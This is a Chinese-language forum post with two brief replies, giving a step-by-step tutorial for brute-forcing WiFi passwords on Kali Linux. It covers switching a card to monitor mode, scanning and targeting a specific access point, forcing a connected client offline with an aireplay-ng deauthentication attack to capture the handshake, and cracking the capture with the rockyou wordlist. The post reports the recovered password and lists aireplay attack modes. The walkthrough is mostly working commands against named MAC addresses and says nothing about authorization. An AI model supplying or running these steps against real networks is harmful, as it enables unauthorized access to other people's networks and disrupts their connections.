请选择 进入手机版 | 继续访问电脑版
查看: 7057|回复: 2

利用KALI暴力破解WiFi密码

[复制链接]
  • TA的每日心情
    无聊
    2020-6-8 14:24
  • 签到天数: 344 天

    [LV.8]以坛为家I

    发表于 2018-9-3 16:59:04 | 显示全部楼层 |阅读模式
    本帖最后由 薯片 于 2018-9-3 16:59 编辑

    1.将无线网卡设置成 monitor 模式 airmon-ng start wlan0

    关闭可影响实验的因素 airmon-ng check kill

    2.运行 airodump-ng wlan0 扫描附近网段

    1.png
    暴力破解 WiFi 密码



    BSSID   wifi 设备的 mac 地址

    PWR   信号强度

    Beacons   数据的速率

    #Data   捕获的数据分组数量

    #/S   十秒内的捕获数据分组数量

    CH   信道号

    MB   数据传输速率

    ENC   加密类型

    CIPHER   加密算法

    AUTH   加密协议

    ESSID WiFi 名称

    3.确定好要破解的网络(以 2.4G 网络(备·)为例) 执行下面的命令

    airodump-ng wlan0 –bssid F4:6A:92:2E:E8:B4 -c 1 -w pj/01

    注释:-c 为指定信道 -w 为文件存放位置并起一个名
    2.png
    暴力破解 WiFi 密码

    出现红框内内容表示已抓取到握手包 准备破解密码

    如果抓不到握手包 可以发动攻击使一个已连接的用户掉线 使其重新认证连接 我们就此机会抓取握手包

    aireplay-ng -0 10 -a F4:6A:92:2E:E8:B4 -c 78:02:F8:F1:8E:CD wlan0
    3.png
    暴力破解 WiFi 密码

    注释:攻击模式为 0 攻击 10 次 攻击次数调为 0 为无限攻击 -a 为 AP 端 mac 地址 -c 为客户端 mac 地址 wlan0 为无线网卡的名字



    附介绍几种攻击模式

    Attack 0: Deauthentication 解除认证

    Attack 1: Fake authentication 伪造身份验证

    Attack 2: Interactive packet replay 交互式数据包重播

    Attack 3: ARP request replay attack ARP 请求重播攻击

    Attack 4: KoreK chopchop attack KoreK 斩杀攻击

    Attack 5: Fragmentation attack 碎片攻击

    Attack 6: Cafe-latte attack 咖啡拿铁攻击

    Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击

    Attack 8: WPA Migration Mode WPA 迁移模式

    Attack 9: Injection test 注射试验

    4.ls 01*查看抓到包 选择 cap 格式
    4.png
    暴力破解 WiFi 密码

    使用字典暴力破解

    aircrack-ng -w /usr/share/wordlists/rockyou.txt 01-02.cap

    5.png

    暴力破解 WiFi 密码



    破解成功 密码为 15331301
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2020-6-8 14:24
  • 签到天数: 344 天

    [LV.8]以坛为家I

     楼主| 发表于 2018-9-3 17:00:13 | 显示全部楼层
    给自己顶一下
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2020-11-17 11:32
  • 签到天数: 14 天

    [LV.3]偶尔看看II

    发表于 2020-4-13 21:39:53 来自手机 | 显示全部楼层
    这个看起来不错
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表